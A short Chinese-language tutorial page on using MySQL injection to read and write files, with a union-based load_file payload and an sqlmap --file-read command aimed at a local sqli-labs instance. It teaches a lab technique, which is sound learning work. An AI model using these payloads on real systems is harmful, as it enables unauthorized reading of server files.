11-MySQL注入讀寫文件 · Web安全攻防 · 看云

<ruby id="bdb3f"></ruby>

<p id="bdb3f"><cite id="bdb3f"></cite></p>

<p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>

<p id="bdb3f"><cite id="bdb3f"></cite></p>

<pre id="bdb3f"></pre>

<pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

<ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
<pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre>

<output id="bdb3f"></output><p id="bdb3f"></p>

<pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

<ruby id="bdb3f"></ruby>

合規國際互聯網加速 OSASE為企業客戶提供高速穩定SD-WAN國際加速解決方案。廣告

![](https://img.kancloud.cn/41/e0/41e066af9a6c25a24868d9667253ec98_1241x333.jpg) ***** ## MySQL注入讀寫文件 MySQL數據庫在滲透過程中能夠使用的功能還是比較多的,除了讀取數據之外,還可以進行對文件進行讀寫(前提是權限足夠) <br>讀取前提: 1.用戶權限足夠高,盡量具有root權限 2.secure\_file\_priv不為null ### 讀取文件內容 ``` http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,load_file('D:\\1.txt'),3 --+ ``` ### 開啟MySQL文件寫入 ``` show variables like '%general%'; # 默認是關閉的 set global general\_log = on; ``` ### 利用sqlmap進行讀寫文件 ``` python sqlmap.py -u "http://127.0.0.1/sqli/Less-7/?id=1" --file-read "D:\\\\1.txt" ```

<ruby id="bdb3f"></ruby>

<p id="bdb3f"><cite id="bdb3f"></cite></p>

<p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>

<p id="bdb3f"><cite id="bdb3f"></cite></p>

<pre id="bdb3f"></pre>

<pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

<ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
<pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre>

<output id="bdb3f"></output><p id="bdb3f"></p>

<pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

<ruby id="bdb3f"></ruby>

哎呀哎呀视频在线观看